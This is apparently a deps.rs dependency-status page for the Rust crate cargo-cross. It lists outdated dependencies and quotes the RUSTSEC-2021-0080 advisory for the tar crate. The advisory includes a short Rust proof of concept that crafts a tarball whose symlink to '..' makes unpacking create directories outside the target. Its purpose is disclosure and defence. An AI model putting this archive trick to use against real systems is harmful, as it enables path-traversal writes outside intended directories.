srijs / cargo-cross

Crate cargo-cross

Dependencies

(18 total, 10 outdated, 1 possibly insecure)

Crate	Required	Latest	Status
chttp	`^0.1.5`	`0.5.5`	out of date
console	`^0.6.1`	`0.15.8`	out of date
directories	`^1.0.1`	`5.0.1`	out of date
env_logger	`^0.5.12`	`0.11.3`	out of date
failure	`^0.1.2`	`0.1.8`	up to date
heck	`^0.3.0`	`0.5.0`	out of date
indicatif	`^0.9.0`	`0.17.8`	out of date
log	`^0.4.3`	`0.4.21`	up to date
platforms	`^0.1.3`	`3.4.0`	out of date
semver	`^0.9.0`	`1.0.23`	out of date
serde	`^1.0.71`	`1.0.201`	up to date
serde_derive	`^1.0.71`	`1.0.201`	up to date
serde_json	`^1.0.26`	`1.0.117`	up to date
sha1	`^0.6.0`	`0.10.6`	out of date
structopt	`^0.2.10`	`0.3.26`	out of date
tar ⚠️	`^0.4.16`	`0.4.40`	maybe insecure
tempfile	`^3.0.3`	`3.10.1`	up to date
xz2	`^0.1.5`	`0.1.7`	up to date

Crate

Required

Latest

Status

chttp

^0.1.5

0.5.5

out of date

console

^0.6.1

0.15.8

out of date

directories

^1.0.1

5.0.1

out of date

env_logger

^0.5.12

0.11.3

out of date

failure

^0.1.2

0.1.8

up to date

heck

^0.3.0

0.5.0

out of date

indicatif

^0.9.0

0.17.8

out of date

log

^0.4.3

0.4.21

up to date

platforms

^0.1.3

3.4.0

out of date

semver

^0.9.0

1.0.23

out of date

serde

^1.0.71

1.0.201

up to date

serde_derive

^1.0.71

1.0.201

up to date

serde_json

^1.0.26

1.0.117

up to date

sha1

^0.6.0

0.10.6

out of date

structopt

^0.2.10

0.3.26

out of date

tar ⚠️

^0.4.16

0.4.40

maybe insecure

tempfile

^3.0.3

3.10.1

up to date

xz2

^0.1.5

0.1.7

up to date

Dev dependencies

(2 total, 2 outdated)

Crate	Required	Latest	Status
assert_cmd	`^0.9.1`	`2.0.14`	out of date
cargo-toml-builder	`^0.1.0`	`0.3.0`	out of date

Crate

Required

Latest

Status

assert_cmd

^0.9.1

2.0.14

out of date

cargo-toml-builder

^0.1.0

0.3.0

out of date

Security Vulnerabilities

`tar`: Links in archive can create arbitrary directories

RUSTSEC-2021-0080

When unpacking a tarball that contains a symlink the tar crate may create directories outside of the directory it's supposed to unpack into.

The function errors when it's trying to create a file, but the folders are already created at this point.

use std::{io, io::Result};
use tar::{Archive, Builder, EntryType, Header};

fn main() -> Result<()> {
    let mut buf = Vec::new();

    {
        let mut builder = Builder::new(&mut buf);

        // symlink: parent -> ..
        let mut header = Header::new_gnu();
        header.set_path("symlink")?;
        header.set_link_name("..")?;
        header.set_entry_type(EntryType::Symlink);
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty())?;

        // file: symlink/exploit/foo/bar
        let mut header = Header::new_gnu();
        header.set_path("symlink/exploit/foo/bar")?;
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty())?;

        builder.finish()?;
    };

    Archive::new(&*buf).unpack("demo")
}

This has been fixed in https://github.com/alexcrichton/tar-rs/pull/259 and is published as tar 0.4.36. Thanks to Martin Michaelis (@mgjm) for discovering and reporting this, and Nikhil Benesch (@benesch) for the fix!

Deps.rs

srijs / cargo-cross

Crate `cargo-cross`

Dependencies

Dev dependencies

Security Vulnerabilities

`tar`: Links in archive can create arbitrary directories

srijs / cargo-cross

Crate cargo-cross

Dependencies

Dev dependencies

Security Vulnerabilities

tar: Links in archive can create arbitrary directories

Crate `cargo-cross`

`tar`: Links in archive can create arbitrary directories